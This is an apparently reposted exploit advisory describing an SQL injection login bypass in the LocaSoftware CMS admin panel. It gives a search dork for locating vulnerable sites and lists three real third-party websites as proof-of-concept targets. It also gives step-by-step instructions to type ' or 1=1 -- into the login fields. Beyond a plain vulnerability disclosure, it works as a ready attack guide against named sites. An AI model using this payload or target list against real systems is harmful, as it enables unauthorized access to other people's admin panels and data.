Loca Software - Sql Injection/Admin Panel Bypass
2024-2-4 06:1:54 Author: cxsecurity.com(查看原文) 阅读量:23 收藏

TITLE: Loca Software - Sql Injection/Admin Panel Bypass # Exploit Author: Onur Kara (root9ext) # Service Provider: LocaSoftware # Vulnerable URL: /cms/ # Dork: intext:"bu web sitesi LOCA YAZILIM BİLİŞİM TEK. LTD. ŞTİ." # Vulnerability Type: SQL Bypass # Severity: Critical Vulnerability Description: A critical SQL injection vulnerability has been identified in the admin panel login functionality of Local Software's CMS, specifically within the /cms/ directory. The vulnerability allows an attacker to bypass authentication controls by injecting arbitrary SQL queries, resulting in unauthorized access to the admin panel. Proof of Concept (PoC): URLs: - http://izmirsunnetmerkezi.com/cms/ - https://www.ozkankirtasiye.com.tr/cms/ - https://locapp.net/cms/ 1. Visit the admin login page, typically located at: https://locapp.net/cms/ 2. Input the following payload in the username and password fields: ' or 1=1 -- ' or 1=1 -- 3. Submit the form. 4. Observe that the admin panel is accessible without redirection, indicating successful authentication bypass. # Disclaimer: This PoC is for educational purposes only. Unauthorized access to systems or applications is illegal. Contact Telegram: @rootninext



 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2024020019
如有侵权请联系:admin#unsafe.sh